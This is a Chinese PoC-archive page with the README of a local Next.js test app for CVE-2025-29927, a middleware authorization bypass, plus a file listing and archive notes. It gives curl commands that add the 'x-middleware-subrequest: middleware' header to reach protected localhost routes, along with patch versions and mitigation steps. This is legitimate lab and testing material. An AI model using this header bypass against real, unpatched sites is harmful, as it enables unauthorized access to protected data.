关联漏洞
介绍
# Next.js Middleware Vulnerability Tester (CVE-2025-29927)
This application demonstrates the Next.js middleware authorization bypass vulnerability (CVE-2025-29927).
## About The Vulnerability
CVE-2025-29927 is an authorization bypass vulnerability in Next.js middleware. By sending a specially crafted HTTP header (`x-middleware-subrequest`), an attacker can bypass authorization checks implemented in the middleware, potentially gaining access to protected resources.
## Setup Instructions
1. Install dependencies:
```
cd /var/www/react-nextjs/test-middleware-skip
npm install
```
2. Run the development server:
```
npm run dev
```
3. The server will start on http://localhost:3000
## Testing the Vulnerability
### Normal Access (Should be Blocked)
Try accessing the protected route normally:
```
npm run test-normal
```
or
```
curl -v http://localhost:3000/protected-data
```
You should receive a 401 Unauthorized response, as the middleware blocks access.
### Exploiting the Vulnerability
Try accessing the protected route with the exploit header:
```
npm run test-exploit
```
or
```
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/protected-data
```
If the application is vulnerable, you'll receive a 200 OK response with the protected data.
### Testing the API Route
Normal access (should be blocked):
```
curl -v http://localhost:3000/api/protected
```
With exploit:
```
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/api/protected
```
## Remediation
To fix this vulnerability, you should:
1. Update Next.js to a patched version:
- Next.js 15.x: Update to 15.2.3 or later
- Next.js 14.x: Update to 14.2.25 or later
- Next.js 13.x: Update to 13.5.9 or later
- Next.js 12.x: Update to 12.3.5 or later
2. If you cannot update, implement a reverse proxy (like Nginx or Cloudflare) that strips the `x-middleware-subrequest` header from incoming requests.
## Additional Test Commands
Test if the API route is vulnerable:
```
# Normal request (should be blocked)
curl -v http://localhost:3000/api/protected
# With exploit header
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/api/protected
```
## Disclaimer
This tool is provided for educational and security testing purposes only. Use it to verify if your own Next.js applications are vulnerable and need patching.
文件快照
[4.0K] /data/pocs/c300792b8773289aac5ccc2f662e85f67b9edf1a
├── [4.0K] app
│ ├── [4.0K] api
│ │ └── [4.0K] protected
│ │ └── [ 837] route.ts
│ ├── [ 626] globals.css
│ ├── [ 502] layout.tsx
│ ├── [1.3K] page.tsx
│ ├── [4.0K] protected-data
│ │ └── [1.0K] page.tsx
│ └── [4.0K] public-data
│ └── [ 667] page.tsx
├── [1.6K] header-variations.sh
├── [1.3K] middleware.ts
├── [ 205] next.config.js
├── [ 603] package.json
├── [ 16K] package-lock.json
├── [3.6K] PROJECT_OVERVIEW.md
├── [4.0K] public
│ ├── [1.3K] next.svg
│ └── [ 629] vercel.svg
├── [2.3K] README.md
├── [1.2K] RUN_TESTS.md
├── [4.0K] src
│ ├── [4.0K] app
│ │ ├── [ 25K] favicon.ico
│ │ ├── [2.2K] globals.css
│ │ ├── [ 456] layout.tsx
│ │ ├── [3.8K] page.module.css
│ │ ├── [2.7K] page.tsx
│ │ └── [4.0K] protected
│ │ └── [ 697] page.tsx
│ └── [1.2K] middleware.ts
├── [4.5K] TESTING_INSTRUCTIONS.md
├── [3.4K] test-vulnerability.sh
├── [ 574] tsconfig.json
├── [1.4K] upgrade-and-test.sh
└── [7.3K] vuln-test-all.sh
9 directories, 28 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。